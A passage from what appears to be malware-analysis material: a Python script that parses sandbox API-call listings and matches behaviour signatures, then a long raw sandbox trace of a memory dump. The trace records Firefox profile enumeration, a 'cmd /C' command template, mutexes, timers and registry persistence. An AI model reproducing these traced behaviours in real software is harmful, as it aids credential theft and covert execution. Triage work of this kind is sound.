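    ("temp_file_use", lambda d, h, s: "GetTempFileNameA" in (d | h)),
    ("firefox_profile_enum", lambda d, h, s: "Mozilla\\Firefox\\Profiles" in s),
]

def parse_args(raw):
    """'C0000000,?,.dll' -> [0xC0000000, '?', '.dll']; '?' is a value the sandbox could not recover."""
    if not raw:
        return []
    return [int(t, 16) if HEX32.fullmatch(t.strip()) else t.strip() for t in raw.split(",")]

def new_record():
    return {"instruction_id": None, "string_id": "", "calls": [], "helper_calls": []}

def parse_listing(text):
    """One record per function block, i.e. per 'Memory Dump Source' line."""
    records = [new_record()]
    for line in text.splitlines():
        if line.strip() == RECORD_START:
            records.append(new_record())
        elif m := API_LINE.match(line):
            call = {"api": m["api"], "module": m["module"], "args": parse_args(m["args"]),
                    "ref": m["ref"], "callee": m["callee"]}
            (records[-1]["helper_calls"] if m["callee"] else records[-1]["calls"]).append(call)
        elif m := STRING_ID_LINE.match(line):
            records[-1]["string_id"] = m["value"].strip()
        elif m := INSTR_ID_LINE.match(line):
            records[-1]["instruction_id"] = m["value"]
    return [r for r in records if r["calls"] or r["helper_calls"]]

def decode_createfile(args):
    """Name access mask and creation disposition of a CreateFileA/W argument list; the list is a
    stack reconstruction that may hold '?' or trailing caller values, so only numeric slots 1 and 4 are read."""
    if len(args) < 5 or not isinstance(args[1], int) or not isinstance(args[4], int):
        return None
    names = [n for bit, n in ACCESS_BITS.items() if args[1] & bit]
    return {"access": "|".join(names) or hex(args[1]),
            "disposition": DISPOSITION.get(args[4], hex(args[4]))}

def triage(text):
    """Per function block: matched behaviours plus every decoded CreateFile* call."""
    findings = []
    for rec in parse_listing(text):
        direct = {c["api"] for c in rec["calls"]}
        helpers = {c["api"] for c in rec["helper_calls"]}
        opens = [decode_createfile(c["args"]) for c in rec["calls"]
                 if c["api"] in ("CreateFileA", "CreateFileW")]
        findings.append({"instruction_id": rec["instruction_id"],
                         "behaviours": [n for n, rule in SIGNATURES
                                        if rule(direct, helpers, rec["string_id"])],
                         "createfile": [o for o in opens if o]})
    return findings

# Excerpt copied from three function blocks above, trimmed to the lines used here.
SAMPLE_LISTING = r"""
Memory Dump Source
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
Memory Dump Source
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
"""
```

Two caveats the listing itself illustrates. First, the argument lists are rebuilt from the stack, not from the prototype: SetEndOfFile takes one handle, yet its line above carries fourteen entries, several of them "?" or return addresses from the caller's frame, so positional decoding is only safe for well-known leading parameters and only when the slot is numeric, which is why decode_createfile reads slots 1 and 4 and nothing else. Second, "Part of subcall function" lines describe the helper, not the caller; the same 001D6F2E directory walk appears under several callers on this page, so the directory_walk rule deliberately counts helper APIs to describe what a caller reaches, while dedup by callee address is the right move when counting distinct behaviours in the sample.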
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
